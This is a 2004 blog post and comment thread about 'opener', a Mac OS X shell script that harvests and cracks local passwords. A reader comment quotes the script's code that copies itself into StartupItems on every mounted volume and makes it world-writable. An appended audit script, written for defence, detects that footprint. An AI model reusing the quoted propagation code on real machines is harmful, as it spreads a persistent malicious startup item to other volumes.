Opener and Hardening the Mac

There has been much wide-eyed hysteria on the Mac sites concerning "opener". While the comments on these sites have generally been on top of it, the news continues to spread, calling it a virus or trojan horse. Check out the MacInTouch story that broke it.

To clear up the confusion, opener is a shell script that does a lot of little insidious things to your OS X box, including dumping your passwords from NetInfo and trying to crack them. This script requires an administrator password to be installed, so the level of threat it poses is relatively small.

To be clear here, this is not a virus or a trojan horse. It does not self-replicate, or masquerade as another application to be installed. This is not to say that someone couldn't package it up and make it look official, but it has not currently gotten that far.

At present, this is purely a security issue. You shouldn't run applications that ask for an administrator password without being sure of the source you obtained them from. You shouldn't allow administrators on your machine that you do not implicitly trust. You should not use the same password for your login on your computer that you use for networked systems. You should not allow physical access to your computer to someone you don't implicitly trust. Passwords should be changed regularly.

Good security policy is a pain in the ass to maintain, but if you want a secure environment, you must maintain it.

Posted by Joe Mullins at October 25, 2004 10:16 AM
Comments

Thank you for your (solitary?!) rational article on opener!

One thing: it really does try to spread but only to locally mounted volumes. (It can't spread to network shares because even if it runs as root locally that does not give it root privileges on an AFP share.) Here's the code from the script:

    # Copy this startup script to any mounted startup volume.
    ls /Volumes | while read vol; do
        if test -d /Volumes/"${vol}"/System/Library ; then
            mkdir /Volumes/"${vol}"/System/Library/StartupItems
            cp -R /System/Library/StartupItems/"${scriptpath}" /Volumes/"${vol}"/System/Library/StartupItems/
            chmod -Rf 777 /Volumes/"${vol}"/System/Library/StartupItems/
        fi
    done

http://freaky.staticusers.net/ugboard/viewtopic.php?t=10712&postdays=0&postorder=asc&start=120

Posted by: mike donleigh at October 26, 2004 06:36 PM
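A defender-side check for the propagation pattern quoted in the comment above, added here as an example; it is not code from the post or from the opener script. It walks every volume under a mount root (assumed to be /Volumes, as in the excerpt) and reports any entry in that volume's System/Library/StartupItems tree that is world-writable, which is the footprint the "chmod -Rf 777" line leaves behind.

```shell
#!/bin/sh
# Added example: audit StartupItems on every mounted volume for the
# world-writable footprint described in the comment. Not from the post.
#
# audit_startupitems [VOLROOT]
#   VOLROOT defaults to /Volumes (assumption: standard OS X mount point).
#   Prints one "volume<TAB>path" line per world-writable entry found.
audit_startupitems() {
    volroot="${1:-/Volumes}"
    for vol in "$volroot"/*; do
        [ -d "$vol" ] || continue
        items="$vol/System/Library/StartupItems"
        # A volume without a StartupItems folder is not a startup volume
        # the script could have copied itself into; skip it.
        [ -d "$items" ] || continue
        # -perm -002: the "other write" bit is set (POSIX octal form).
        # The StartupItems directory itself is included in the walk.
        find "$items" -perm -002 -print 2>/dev/null |
        while IFS= read -r path; do
            printf '%s\t%s\n' "${vol##*/}" "$path"
        done
    done
}

# Number of findings across all volumes; 0 means nothing world-writable.
count_startupitem_findings() {
    audit_startupitems "$1" | grep -c .
}

# Stand-alone use: "sh audit.sh --run [VOLROOT]" prints the findings
# and exits non-zero when there is anything to look at.
case "${1:-}" in
    --run)
        n=$(count_startupitem_findings "${2:-}")
        audit_startupitems "${2:-}"
        [ "$n" -eq 0 ]
        ;;
esac
```

Run it as root so that every volume is readable; any line of output is a reason to inspect that volume's StartupItems by hand, since legitimate startup items are root-owned and not world-writable.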
